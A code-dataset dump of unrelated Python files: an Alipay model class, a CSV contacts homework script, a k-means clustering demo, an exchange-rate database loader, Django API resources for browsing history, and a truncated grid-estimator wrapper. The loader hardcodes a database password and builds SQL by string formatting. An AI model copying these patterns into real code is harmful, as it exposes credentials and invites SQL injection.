in range(0, len(self.principal)):\n element = self.principal[i]\n if hasattr(element, 'to_alipay_dict'):\n self.principal[i] = element.to_alipay_dict()\n if hasattr(self.principal, 'to_alipay_dict'):\n params['principal'] = self.principal.to_alipay_dict()\n else:\n params['principal'] = self.principal\n if self.supplier_id:\n if hasattr(self.supplier_id, 'to_alipay_dict'):\n params['supplier_id'] = self.supplier_id.to_alipay_dict()\n else:\n params['supplier_id'] = self.supplier_id\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayCommerceIotMdeviceprodDeviceBindModel()\n if 'biz_tid' in d:\n o.biz_tid = d['biz_tid']\n if 'device_sn' in d:\n o.device_sn = d['device_sn']\n if 'ext_info' in d:\n o.ext_info = d['ext_info']\n if 'identify_type' in d:\n o.identify_type = d['identify_type']\n if 'principal' in d:\n o.principal = d['principal']\n if 'supplier_id' in d:\n o.supplier_id = d['supplier_id']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayCommerceIotMdeviceprodDeviceBindModel.py","file_name":"AlipayCommerceIotMdeviceprodDeviceBindModel.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"416679700","text":"\"\"\"\n1. csv 파일 저장하기\n2. csv 파일 읽어오기\n3. 현재 내용 콘솔 출력\n4. 연락처 설계\n\n회원정보:\n이름/휴대폰번호/집주소/등록일/\n\"\"\"\n\nimport datetime\nimport csv\n\n\ndef writeCSV(database):\n try:\n CSV_PATH = './hw01/data_new.csv'\n with open(CSV_PATH, 'w', newline='') as datafile:\n fieldnames = ['id','name','phone_number','address','created_at','is_member']\n writer = csv.DictWriter(datafile, fieldnames=fieldnames)\n writer.writeheader()\n for i in database:\n writer.writerow(\n {\n 'id': i.id,\n 'name': i.name,\n 'phone_number': i.phone_number,\n 'address': i.address,\n 'created_at': i.created_at if i.created_at else datetime.date.today(),\n 'is_member': i.is_member\n }\n )\n\n finally:\n datafile.close()\n\n\ndef getCSV(database):\n try:\n CSV_PATH = './hw01/data.csv'\n with open(CSV_PATH) as datafile:\n reader = csv.DictReader(datafile)\n for row in reader:\n member = Member(\n row['id'].strip(),\n row['name'].strip(),\n row['phone_number'].strip(),\n row['address'].strip(),\n row['created_at'].strip() if row['created_at'].strip() else datetime.date.today(),\n True if row['is_member'].strip() == '1' else False\n )\n database.append(member)\n\n finally:\n datafile.close()\n\n\ndef showDatabase(database):\n for i in database:\n print(i.id, i.name, i.phone_number, i.address, i.created_at, i.is_member)\n\n\nmember_database = []\n\n\nclass Member:\n def __init__(self, id, name, phone_number, address, created_at, is_member=True):\n self.id = id\n self.name = name\n self.phone_number = phone_number\n self.address = address\n self.created_at = created_at\n self.is_member = is_member\n\n\ngetCSV(member_database)\nwriteCSV(member_database)\nshowDatabase(member_database)\n\n\n","sub_path":"hw01/hw_01.py","file_name":"hw_01.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"290599580","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.cluster import KMeans\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nclass KmeanAlgorithm(object):\n @staticmethod\n def read_data():\n root = Path(__file__).parent.parent.parent.parent\n df = pd.read_csv(str(root) + \"/data/user.csv\")\n df.head()\n\n return df\n\n @staticmethod\n def show_age_fregquency(df):\n plt.figure(figsize=(10, 6))\n plt.title('ages frequency')\n sns.axes_style('dark')\n sns.violinplot(y=df['age'])\n plt.show()\n\n @staticmethod\n def show_spendingscore_salary_frequency(df):\n plt.figure(figsize=(25, 10))\n plt.subplot(1, 2, 1)\n sns.boxplot(y=df[\"spending_score\"], color=\"yellow\")\n plt.subplot(1, 2, 2)\n sns.boxplot(y=df[\"salary\"])\n plt.show()\n\n @staticmethod\n def show_gender_frequency(df):\n genders = df.gender.value_counts()\n sns.set_style(\"darkgrid\")\n plt.figure(figsize=(20, 14))\n sns.barplot(x=genders.index, y=genders.values)\n plt.show()\n\n @staticmethod\n def show_age_count(df):\n age18_25 = df.age[(df.age <= 25) & (df.age >= 18)]\n age26_35 = df.age[(df.age <= 35) & (df.age >= 26)]\n age36_45 = df.age[(df.age <= 45) & (df.age >= 36)]\n age46_55 = df.age[(df.age <= 55) & (df.age >= 46)]\n age55above = df.age[df.age >= 56]\n\n x = [\"18-25\", \"26-35\", \"36-45\", \"46-55\", \"55+\"]\n y = [len(age18_25.values), len(age26_35.values), len(age36_45.values), len(age46_55.values),\n len(age55above.values)]\n\n plt.figure(figsize=(25, 16))\n sns.barplot(x=x, y=y, palette=\"rocket\")\n plt.title(\"number of customer and ages\")\n plt.xlabel(\"age\")\n plt.ylabel(\"number of customer\")\n plt.show()\n\n @staticmethod\n def show_spending_score_count(df):\n ss1_20 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 1) & (df[\"spending_score\"] <= 20)]\n ss21_40 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 21) & (df[\"spending_score\"] <= 40)]\n ss41_60 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 41) & (df[\"spending_score\"] <= 60)]\n ss61_80 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 61) & (df[\"spending_score\"] <= 80)]\n ss81_100 = df[\"spending_score\"][\n (df[\"spending_score\"] >= 81) & (df[\"spending_score\"] <= 100)]\n\n ssx = [\"1-20\", \"21-40\", \"41-60\", \"61-80\", \"81-100\"]\n ssy = [len(ss1_20.values), len(ss21_40.values), len(ss41_60.values), len(ss61_80.values), len(ss81_100.values)]\n\n plt.figure(figsize=(20, 10))\n sns.barplot(x=ssx, y=ssy, palette=\"nipy_spectral_r\")\n plt.title(\"Spending Scores\")\n plt.xlabel(\"Score\")\n plt.ylabel(\"Number of Customer Having the Score\")\n plt.show()\n\n @staticmethod\n def show_salary_count(df):\n sl0_30 = df[\"salary\"][(df[\"salary\"] >= 0) & (df[\"salary\"] <= 30)]\n sl31_60 = df[\"salary\"][(df[\"salary\"] >= 31) & (df[\"salary\"] <= 60)]\n sl61_90 = df[\"salary\"][(df[\"salary\"] >= 61) & (df[\"salary\"] <= 90)]\n sl91_120 = df[\"salary\"][(df[\"salary\"] >= 91) & (df[\"salary\"] <= 120)]\n sl121_150 = df[\"salary\"][(df[\"salary\"] >= 121) & (df[\"salary\"] <= 150)]\n\n slx = [\"$ 0 - 30,000\", \"$ 30,001 - 60,000\", \"$ 60,001 - 90,000\", \"$ 90,001 - 120,000\", \"$ 120,001 - 150,000\"]\n sly = [len(sl0_30.values), len(sl31_60.values), len(sl61_90.values), len(sl91_120.values),\n len(sl121_150.values)]\n\n plt.figure(figsize=(15, 6))\n sns.barplot(x=slx, y=sly, palette=\"Set2\")\n plt.title(\"salary\")\n plt.xlabel(\"results\")\n plt.ylabel(\"number of user\")\n plt.show()\n\n @staticmethod\n def kmean_clustering(df):\n km = KMeans(n_clusters=5)\n clusters = km.fit_predict(df.iloc[:, 2:])\n df[\"label\"] = clusters\n return df\n\n @staticmethod\n def show_kmean_clustering(df):\n df = KmeanAlgorithm().kmean_clustering(df)\n fig = plt.figure(figsize=(20, 13))\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(df.age[df.label == 0], df[\"salary\"][df.label == 0],\n df[\"spending_score\"][df.label == 0], c='yellow', s=80)\n ax.scatter(df.age[df.label == 1], df[\"salary\"][df.label == 1],\n df[\"spending_score\"][df.label == 1], c='red', s=80)\n ax.scatter(df.age[df.label == 2], df[\"salary\"][df.label == 2],\n df[\"spending_score\"][df.label == 2], c='green', s=80)\n ax.scatter(df.age[df.label == 3], df[\"salary\"][df.label == 3],\n df[\"spending_score\"][df.label == 3], c='black', s=80)\n ax.scatter(df.age[df.label == 4], df[\"salary\"][df.label == 4],\n df[\"spending_score\"][df.label == 4], c='blue', s=80)\n ax.view_init(30, 185)\n plt.xlabel(\"age\")\n plt.ylabel(\"salary\")\n ax.set_zlabel('spending score (1-100)')\n plt.show()\n\n\n# Show demo\nif __name__ == '__main__':\n df = KmeanAlgorithm().read_data()\n\n KmeanAlgorithm().show_age_fregquency(df)\n KmeanAlgorithm().show_spendingscore_salary_frequency(df)\n KmeanAlgorithm().show_gender_frequency(df)\n KmeanAlgorithm().show_age_count(df)\n KmeanAlgorithm().show_spending_score_count(df)\n KmeanAlgorithm().show_salary_count(df)\n KmeanAlgorithm().show_kmean_clustering(df)\n","sub_path":"clustering-users-kmeans/com/dimageshare/algorithm/kmean_algorithm.py","file_name":"kmean_algorithm.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"316160325","text":"import json\nimport pymysql\nimport os\nfrom datetime import datetime\n\nUSD_CAD_RATE_KEY = \"FXUSDCAD\"\n\ndef get_db_params_from_env():\n return {\n 'host': os.environ.get('DB_HOST') or 'localhost',\n 'port': os.environ.get('DB_PORT') or 3306,\n 'db': os.environ.get('DB_NAME'),\n 'user': os.environ.get('DB_USERNAME') or 'admin',\n 'passwd': os.environ.get('DB_PASSWORD')\n }\n\ndef get_db_conn():\n db_params = get_db_params_from_env()\n return pymysql.connect(**db_params) \n\ndef load_file(filepath, conn):\n file = open(filepath, \"r\")\n p = file.read()\n j = json.loads(p)\n with conn.cursor() as cur:\n for o in j['observations']:\n insert_obs_in_db(cur, o)\n conn.commit()\n\n\ndef insert_obs_in_db(cur, obs):\n date = obs['d']\n rate = obs[USD_CAD_RATE_KEY][\"v\"]\n sql = (\n \"INSERT INTO exchange_rate (date, from_curr, to_curr, type, rate) \"\n \"VALUES ('{date}', 'USD', 'CAD', 'Noon', {rate})\"\n )\n cur.execute(sql.format(\n date=date,\n rate=rate\n )\n )\n \n\nif __name__ == \"__main__\":\n os.environ['DB_NAME'] = \"investornetwork\"\n os.environ['DB_PASSWORD'] = \"irondesk89\"\n conn = get_db_conn()\n load_file(\"./FX_RATES_DAILY-sd-2017-01-03.json\", conn)\n\n","sub_path":"chalicelib/load_bankofcanada_rates.py","file_name":"load_bankofcanada_rates.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"644941083","text":"from django.contrib.sessions.models import Session\nfrom django.contrib.auth.models import User\nfrom django.conf.urls import url\nfrom django.core.exceptions import MultipleObjectsReturned\nfrom django.core.management import call_command\n\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom tastypie.authorization import Authorization\nfrom tastypie.authentication import BasicAuthentication\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie import fields\n\nfrom api.defaults import DEFAULT_BLACKLIST\nfrom accounts.models import UserProfile\nfrom api.models import *\nfrom resource_helpers import *\n\nfrom common.templatetags.filters import url_domain\n\nclass MyBasicAuthentication(BasicAuthentication):\n def __init__(self, *args, **kwargs):\n super(MyBasicAuthentication, self).__init__(*args, **kwargs)\n\n def is_authenticated(self, request, **kwargs):\n if 'sessionid' in request.COOKIES:\n s = Session.objects.filter(pk=request.COOKIES['sessionid'])\n if s.exists():\n s = s[0]\n if '_auth_user_id' in s.get_decoded():\n u = User.objects.get(id=s.get_decoded()['_auth_user_id'])\n request.user = u\n return True \n return False\n\nclass BaseMeta:\n \"\"\"\n Abstract class to get basic authentication and authorization.\n \"\"\"\n authentication = MyBasicAuthentication()\n authorization = DjangoAuthorization()\n serializer = urlencodeSerializer()\n\nclass BaseResource(ModelResource):\n \"\"\"\n Subclass this to get generic ModelResource add-ins that TastyPie doesn't supply.\n \"\"\"\n def apply_authorization_limits(self, request, object_list):\n return object_list.filter(user=request.user) \n\nclass UserResource(ModelResource):\n\n def override_urls(self):\n return [\n url(r\"^(?P%s)/(?P[\\w\\d_.-]+)/$\" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name=\"api_dispatch_detail\"),\n ]\n\n class Meta(BaseMeta):\n queryset = User.objects.all()\n resource_name = 'user'\n \n detail_allowed_methods = ['get']\n list_allowed_methods = []\n fields = ['username', 'first_name', 'last_name', 'last_login']\n\n filtering = {\n 'username': ALL,\n }\n\nclass UserProfileResource(ModelResource):\n\n user = fields.ForeignKey(UserResource, 'user')\n\n class Meta(BaseMeta):\n queryset = UserProfile.objects.all()\n resource_name = 'user_profile'\n\n detail_allowed_methods = ['get']\n list_allowed_methods = []\n fields = ['pic_url']\n filtering = {\n 'user' : ALL_WITH_RELATIONS\n }\n\nclass FilterSetItemResource(BaseResource):\n \"\"\"\n Abstract base class\n \"\"\"\n user = fields.ForeignKey(UserResource, 'user') \n \n class Meta(BaseMeta):\n\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'user': ALL_WITH_RELATIONS,\n 'date_created': ALL,\n 'url' : ALL,\n }\n resource_name = 'filterset'\n\n\nclass WhiteListItemResource(FilterSetItemResource):\n\n def obj_create(self, bundle, request=None, **kwargs):\n url = bundle.data['url']\n \n blacklist_item = get_BlackListItem(url) #check to see if this exists\n if blacklist_item:\n blacklist_item.delete()\n\n #do not create if it is a default blacklist url\n if url in DEFAULT_BLACKLIST:\n return bundle\n\n try:\n obj = WhiteListItem.objects.get(user=request.user, url=url)\n except WhiteListItem.DoesNotExist:\n return super(WhiteListItemResource, self).obj_create(bundle, request, user=request.user, **kwargs)\n except MultipleObjectsReturned: \n #multiple items created, delete duplicates\n call_command(\"remove_duplicate_filtersets\")\n return bundle\n\n class Meta(FilterSetItemResource.Meta):\n\n queryset = WhiteListItem.objects.select_related().all()\n resource_name = 'whitelist'\n\nclass BlackListItemResource(FilterSetItemResource):\n \n def obj_create(self, bundle, request=None, **kwargs):\n\n url = bundle.data['url']\n\n whitelist_item = get_WhiteListItem(url) #check to see if this exists\n if whitelist_item:\n whitelist_item.delete()\n try:\n obj = BlackListItem.objects.get(user=request.user, url=url)\n except BlackListItem.DoesNotExist:\n return super(BlackListItemResource, self).obj_create(bundle, request, user=request.user, **kwargs) \n except MultipleObjectsReturned:\n #multiple items created, delete duplicates\n call_command(\"remove_duplicate_filtersets\")\n return bundle\n\n class Meta(FilterSetItemResource.Meta):\n\n queryset = BlackListItem.objects.select_related().all()\n resource_name = 'blacklist'\n\n\nclass EyeHistoryResource(BaseResource):\n user = fields.ForeignKey(UserResource, 'user')\n\n class Meta(BaseMeta):\n queryset = EyeHistory.objects.select_related().all()\n resource_name = 'history-data'\n\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'user': ALL_WITH_RELATIONS,\n 'url' : ALL,\n 'title' : ALL,\n 'start_time' : ALL,\n 'end_time' : ALL,\n 'total_time' : ALL,\n }\n\n def obj_create(self, bundle, request=None, **kwargs):\n url = bundle.data['url']\n domain = url_domain(url)\n \n bundle.data[\"domain\"] = domain\n\n title = bundle.data['title']\n total_time = bundle.data['total_time']\n src = bundle.data['src']\n \n if not in_Whitelist(url):\n return bundle\n \n try:\n obj = EyeHistory.objects.get(user=request.user, url=url, domain=domain, title=title, total_time=total_time, src=src)\n \n except EyeHistory.DoesNotExist:\n return super(EyeHistoryResource, self).obj_create(bundle, request, user=request.user, **kwargs)\n\n except MultipleObjectsReturned:\n #multiple items created, delete duplicates\n call_command(\"remove_duplicate_history\")\n \n return bundle\n","sub_path":"api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":6369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"388059198","text":"\n\nfrom pyxbos.process import run_loop, config_from_file #https://github.com/gtfierro/xboswave/blob/master/python/pyxbos/pyxbos/process.py\nfrom pyxbos.drivers import pbc #https://github.com/gtfierro/xboswave/tree/master/python/pyxbos/pyxbos/drivers\n# above imports LPBCProcess, SPBCProcess, EnergiseMessage, LPBCStatus, LPBCCommand, SPBC, EnergiseError\nimport sys\nimport matplotlib.pyplot as plt\nimport os #HERE for saving plots\nimport asyncio #for getting the loop\n#from pathlib import Path # https://medium.com/@ageitgey/python-3-quick-tip-the-easy-way-to-deal-with-file-paths-on-windows-mac-and-linux-11a072b58d5f\nimport numpy as np\nimport pandas as pd\nimport time as pytime\nimport warnings\nimport logging\nimport requests\nfrom requests_futures.sessions import FuturesSession\nfrom pymodbus.client.sync import ModbusTcpClient as ModbusClient\nimport configparser\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nlogging.basicConfig(level=\"INFO\", format='%(asctime)s - %(name)s - %(message)s')\n\n# from PIcontroller import *\n# from LQRcontroller import *\nfrom Zestimator import *\n\n\n'''\nZestimator Assumptions:\n- P and Q commands are implemented for the entire time during which the estimation is max_degrees.\n (this will create issues if the P and Q commands arent recieved immediately)\n\nFlexlab comands and measurements:\nPMU measures positive INTO the battery for both P and Q (inverter looks like an inductor for positive Q measurent)\nInverter Pmax limiting is ambigious to direction\nInverter power factor commands are for Q only, defined positive for reactive power into the network, or OUT of the battery (this is the oppposite of how the PMU measures it)\n\nChanges made for flexlab convention:\nDid not change anything within PQcalc or phasorI_calc\nDid switch the sign of self.Icomp_pu, which is fed into the impedance estimator only\nDid not switch the sign of Pact and Qact (which are positive out of network), or Pcmd and Qcmd (which are positive into the network)\nSwitched signs of Pact and Qact that are fed into check saturation and ICDI (which still communicates to SPBC using postive into network convention)\ninverters are positive P out of the network for batt commands (positive P into the network for inverter-limiting commands)\ninverters are positive Q into the netowk (because of how PF is calculated)\nload_cmd is still postive into the network (for just P)\nmodbus is positive out of the network (switched internally)\n'''\n\n\n#to use session.get for parallel API commands you have to download futures: pip install --user requests-futures\n\nclass Zestwrapper(pbc.LPBCProcess): #this is related to super(), inherits attributes and behaviors from pbc.LPBCProcess (which is a wrapper for XBOSProcess)\n def __init__(self, cfg, busId, testcase, nphases, act_idxs, actType, plug_to_phase_idx, timesteplength, currentMeasExists, kVbase, network_kVAbase, localSratio=1, localVratio=1, ORT_max_kVA=500, VmagScaling=1, Zeffk_init_mult='None'):#, loop='None'):\n super().__init__(cfg) #cfg goes to LPBCProcess https://github.com/gtfierro/xboswave/blob/master/python/pyxbos/pyxbos/drivers/pbc/pbc_framework.py\n\n # self.loop = loop\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n print(f'Building LPBC for performance node {busId}')\n self.busId = busId\n self.timesteplength = timesteplength\n\n #These are new #HEREE\n # self.useRefNodeforVcalc = True\n self.useRefNodeforVcalc = False\n useV0forVth = False\n useNominalVforPsi = True\n # self.Vang_fict = None #not using these any more\n # self.max_delta_ang = 20 #(degrees)\n self.measurementFreq = 120 #how many measurements the PMU produces in a second\n self.nomFreq = 60 #the nominal frequency used by PMUs for the synchrophasor measurements\n self.freqTol = self.nomFreq*.001 #arbitrary\n\n # self.baseP_pu = 0\n # self.baseQ_pu = 0\n # self.baseP_pu = .1\n # self.baseQ_pu = .1\n # # self.perturbPowerCommand = 0\n # # self.perturbScale = .1\n # self.perturbScale = 1\n\n self.baseP_pu = 1\n self.baseQ_pu = self.baseP_pu\n # self.perturbScale = .005\n self.perturbScale = .01\n # self.perturbScale = 0\n # self.Pcmd_pu = (np.ones(self.nphases) + np.random.randn(self.nphases)*self.perturbScale) * self.baseP_pu\n\n '''\n Zestimation:\n current that is measured is based on localSbase, not networkSbase\n so the current measurement used to estimate Z should use localSbase\n (current meas has not accounted for inverter offset hack to reduce oscillations)\n '''\n # self.usingNonpuZeff = 0 #setting this to 0 loads the saved pu Zeffk, to 1 loads the non pu Zeffk and waits for the first SPBC target to set the pu Zeffk\n # self.ZeffkestinitHasNotBeenInitialized = 1 #only useful if self.usingNonpuZeff = 1, necessary bc KVA base is not received until first packet is received from the SPBC\n # if self.usingNonpuZeff:\n # ZeffkinitInPU = 0\n # Zeffkpath = 'networkImpedanceModels/Zeffks/' + str(testcase) + '/notPU' + '/Zeffk_bus' + str(busId) + '.csv' #alternative\n # # if testcase == 'manual': #HERE for debugging, assumes 13bal is used\n # # Zeffkpath = 'networkImpedanceModels/Zeffks/' + '13bal' + '/notPU' + '/Zeffk_bus' + str(busId) + '.csv' #alternative\n # else:\n # ZeffkinitInPU = 1\n Zeffkpath = 'networkImpedanceModels/Zeffks/' + str(testcase) + '/PU' + '/Zeffk_bus' + str(busId) + '.csv'\n # if testcase == 'manual': #HERE for debugging, assumes 13bal is used\n # Zeffkpath = 'networkImpedanceModels/Zeffks/' + '13bal' + '/PU' + '/Zeffk_bus' + str(busId) + '.csv'\n Zeffk_df = pd.read_csv(Zeffkpath, index_col=0) #index_col=0 bc of how Im saving the df (should have done index = false)\n Zeffk_df = Zeffk_df.apply(lambda col: col.apply(lambda val: complex(val.strip('()')))) #bc data is complex\n Zeffk_init = np.asmatrix(Zeffk_df.values)\n\n #for logging Zeff estimation error\n # self.ZeffkError = []\n # self.GtMag = []\n # if self.usingNonpuZeff == 0:\n self.ZeffkTru = Zeffk_init.copy() #self.ZeffkTru is an attribute of lpbcwrapper rather than the LQR controller bc the LQR doesnt know ZeffkTru (wrapper wouldnt either, in actual implementations)\n print(f'ZeffkTru (PU) bus {busId}: ', self.ZeffkTru)\n #else wait till Zbase is #HERE will assigning a self. later create an error?\n\n self.Zeffkintermed = self.ZeffkTru.copy()\n\n #for testing the Zeffestimator\n if Zeffk_init_mult < 0:\n simNum = -Zeffk_init_mult\n Zeffk_init_mult = 'uniRandom'\n if Zeffk_init_mult == 'None':\n Zeffk_init_mult = .5\n # Zeffk_init_mult = .75\n # Zeffk_init_mult = 1\n # Zeffk_init_mult = 1.25\n # Zeffk_init_mult = 1.5\n # Zeffk_init_mult = 2\n self.Zeff_kinit = Zeffk_init*Zeffk_init_mult\n elif Zeffk_init_mult == 'uniRandom':\n self.Zeff_kinit = self.ZeffkTru.copy()\n for i in np.arange(nphases):\n for k in np.arange(nphases):\n self.Zeff_kinit[i,k] = Zeffk_init[i,k]*2*np.random.uniform()\n else:\n self.Zeff_kinit = Zeffk_init*Zeffk_init_mult\n self.Zeffk_init_mult = Zeffk_init_mult\n print('self.Zeffk_init_mult ', self.Zeffk_init_mult)\n print(f'Zeffk_init_mult (PU) bus {busId}: ', self.Zeffk_init_mult)\n print(f'Zeffk_init (PU) bus {busId}: ', self.Zeff_kinit)\n if Zeffk_init_mult == 'uniRandom':\n self.initErrString = f'eps=uniRandom{simNum}'\n else:\n self.initErrString = f'eps={self.Zeffk_init_mult}'\n ######################## LQR Controller Parameters #######################\n #General controller parameters\n linearizeplant = 1 #determines how the (V-V0) voltage is converted into an eq power injection\n\n #REIE parameters\n # lam = .99 # 0 < lam < 1, smaller lam changes state faster (more noise sensitive)\n lam = .95\n # lam = .5\n # GtInitScale = 1\n GtInitScale = 100\n # GtInitScale = 1000\n controllerUpdateCadence = 1 #this is the cadence (of timesteps) with which K is updated\n\n # Gt = np.asmatrix(np.eye(3))*(1+1j)*GtInitScale\n Gt = np.asmatrix(np.eye(3))*GtInitScale\n\n assert nphases == 3, 'LQR controller has only been set up for 3 phases at the moment'\n # self.useRelativeMeas = 0 #default is 0. setting to 1 runs LQR with relative V measurements rather than nonRelative V measurements (still uses relative Vcomp)\n # self.estimator = LQRcontroller(busId,nphases,timesteplength,Qcost,Rcost,Zeffk_init,est_Zeffk,cancelDists,currentMeasExists,lpAlpha,lam,Gt,controllerUpdateCadence,linearizeplant,ZeffkinitInPU)\n self.estimator = Zestimator(busId,nphases,self.Zeff_kinit,useNominalVforPsi,useV0forVth,currentMeasExists,lam,Gt)\n\n # self.estimatorInitialized = 0 # For LQR: flag to initialize Zest (and set unaive before turning on controller)\n\n self.ametek_phase_shift = 0 #in degrees\n self.actType = actType\n\n self.nphases = nphases\n self.iteration_counter = 0\n\n self.Pcmd_kVA = np.zeros(nphases)\n self.Qcmd_kVA = np.zeros(nphases) #Pcmd comes from the feedback controller\n self.Pcmd_pu = np.zeros(nphases) #both Pcmd and Pact are in the local power setting (not the amplified OpalRT setting which is just multiplied by localSratio)\n self.Qcmd_pu = np.zeros(nphases)\n\n self.Pact_kVA = np.zeros(nphases) #Pactual (measured from pmus, used to calc saturation)\n self.Qact_kVA = np.zeros(nphases)\n self.Pact = np.zeros(nphases)\n self.Qact = np.zeros(nphases)\n self.Pact_pu = np.zeros(nphases)\n self.Qact_pu = np.zeros(nphases)\n\n #all angles should be in radians\n self.Vang_with120degshifts = np.asarray([np.NaN]*nphases) #The notRelative angles are created by subtracting the angle timestamp for the FIRST phase from ALL the phases, which will give angles seperated by ~120degrees.\n self.Vang_without120degshifts = np.asarray([np.NaN]*nphases) #relative angles have the reference angle (timestamp) for each phase subtracted for each phase, which will NOT give angles seperated by ~120degrees.\n self.Vmag = np.zeros(nphases)\n self.Vmag_pu = np.zeros(nphases)\n self.Vmag_relative = np.zeros(nphases)\n self.Vmag_relative_pu = np.zeros(nphases)\n self.phasor_error_ang = np.zeros(nphases)\n self.phasor_error_mag_pu = np.zeros(nphases)\n self.VmagRef = np.zeros(nphases) #rename these V0mag and V0ang at some point\n self.VmagRef_pu = np.zeros(nphases)\n self.VangRef = np.zeros(nphases)\n\n # #Just need to decide what to call unintialized values (probably np.zero if more than 1 dimension)\n # #Targets received from SPBC, right now VmagTarg as relative not abosolute\n # self.VangTarg_relative = 'initialize' #intialized the first time a phasor_target packet comes from the SPBC, control loop isnt run until a packet is received\n # #VangTarg_relative subtracts the reference nodes angle for each phase from each phase, so the realtive angles are all around 0 (rather than [0, -120, 120])\n # self.VmagTarg_pu = 'initialize' #all angles should be in radians\n # # self.VmagTarg_pu = np.zeros(nphases) #rn SPBC sends targets in relative_pu, so these aren't needed\n # # self.VmagTarg_relative = np.zeros(nphases)\n # self.VmagTarg_relative_pu = np.zeros(nphases)\n self.status_phases = plug_to_phase_idx #no idea if this is correct, just did it to avoid an error\n\n self.localVratio = localVratio #!= 1 if Ametek voltage ratio needs to be taken into account (ie PMU123 not PMUP123 used for the voltage)\n self.localSratio = localSratio #ratio between actual power and power in Opal siulation, eg 500/3.3\n self.ORT_max_VA = ORT_max_kVA * 1000\n #HEREE\n self.kVbase = np.asarray(kVbase)\n self.network_kVAbase = np.asarray(network_kVAbase)\n self.localkVbase = self.kVbase/self.localVratio\n self.localkVAbase = self.network_kVAbase/self.localSratio #self.localkVAbase takes into account self.localSratio here\n self.localIbase = self.localkVAbase/self.localkVbase\n print('kVbase bus ' + str(self.busId) + ' : ' + str(self.kVbase))\n print('network_kVAbase bus ' + str(self.busId) + ' : ' + str(self.network_kVAbase))\n print('self.localSratio : ' + str(self.localSratio))\n print('self.localkVAbase : ' + str(self.localkVAbase))\n print('self.localkVbase : ' + str(self.localkVbase))\n\n # self.plug_to_phase_map = plug_to_phase_map #3-entry vector that maps PMU channels to the true phases (SPBC commands should be given in terms of the true phases)\n self.plug_to_phase_idx = plug_to_phase_idx\n self.plug_to_V_idx = [0] * nphases #maps the plugs (ordered L1 L2 L3) of the PMU to the entries of the V (or I) vectors such that the order is always A then B then C (when each phase is available)\n #if 2 or 3 phase do below: (if its single phase you can just leave it)\n if nphases > 1:\n if 'A' in self.plug_to_phase_idx[:nphases]: #takes care of the 3-phase, and 2 of the 3 2-phase scenarios # dont the :nphases if plug_to_phase_map is 3-long\n for i, phase in enumerate(self.plug_to_phase_idx[:nphases]): #[:nphases] gives the first nphases values (so it takes care of the cases when current measurements are included as well)\n if phase == 'A':\n self.plug_to_V_idx[i] = 0 #eg if L2 maps to A then then second entry of self.plug_to_V_idx will be 0\n if phase == 'B':\n self.plug_to_V_idx[i] = 1\n if phase == 'C':\n self.plug_to_V_idx[i] = 2 - (3 - nphases) #writes a 1 if just A and C\n else:\n for i, phase in enumerate(self.plug_to_phase_idx[:nphases]): #takes care of the case when just B and C phases are present\n if phase == 'B':\n self.plug_to_V_idx[i] = 0\n if phase == 'C':\n self.plug_to_V_idx[i] = 1\n\n #current measurements\n self.Iang_relative = 'initialize'\n self.Iang_notRelative = 'initialize'\n self.Imag = np.zeros(nphases)\n self.Icomp_est = np.zeros(nphases,dtype=np.complex_)\n self.Icomp_pu_est = np.zeros(nphases,dtype=np.complex_)\n self.Icomp = np.zeros(nphases,dtype=np.complex_)\n self.Icomp_pu = np.zeros(nphases,dtype=np.complex_)\n\n #saturation variables\n self.sat_arrayP = np.ones(nphases) #logic vectors which are 1 if a given phase is not saturated, and zero if it is\n self.sat_arrayQ = np.ones(nphases) #if no current measurements, then these will just stay zero and saturated == 0\n self.Pmax_pu = np.asarray([np.NaN] * nphases) #this signal is used by the SPBC if ICDI is true, otherwise its a nan\n self.Qmax_pu = np.asarray([np.NaN] * nphases)\n self.saturationCounterLimit = 5\n self.Psat = np.ones((nphases, self.saturationCounterLimit)) #set of sat_arrayPs\n self.Qsat = np.ones((nphases, self.saturationCounterLimit))\n self.ICDI_sigP = np.zeros((nphases, 1), dtype=bool) #I Cant Do It signal, defaulted to zero (that it can do it)\n self.ICDI_sigQ = np.zeros((nphases, 1), dtype=bool)\n\n #phasor calc\n self.local_time_index = [np.NaN]*nphases\n self.ref_time_index = [np.NaN]*nphases\n\n self.nPhasorReadings = 120 #120 is 1 seconds-worth of 120 hz measurements # number of time measurements that phasorV_calc looks into the past to find a match\n # important for this to be << than the actuation rate (period), since the phasor commands dont occur instantaneously\n self.pmuTimeWindow = 2000000 #in ns, 2000000 is 2 ms #allowable time window for phasor measurements to be considered concurrent\n\n # https config\n #these are the actuators (inverters) that are controlled by a given lpbc. inverters are counted off 1,2,3, loads are counted off 0,1,2\n self.act_idxs = np.asarray(act_idxs)\n #'inverter' or 'load'\n if self.actType == 'inverter':\n self.act_idxs = 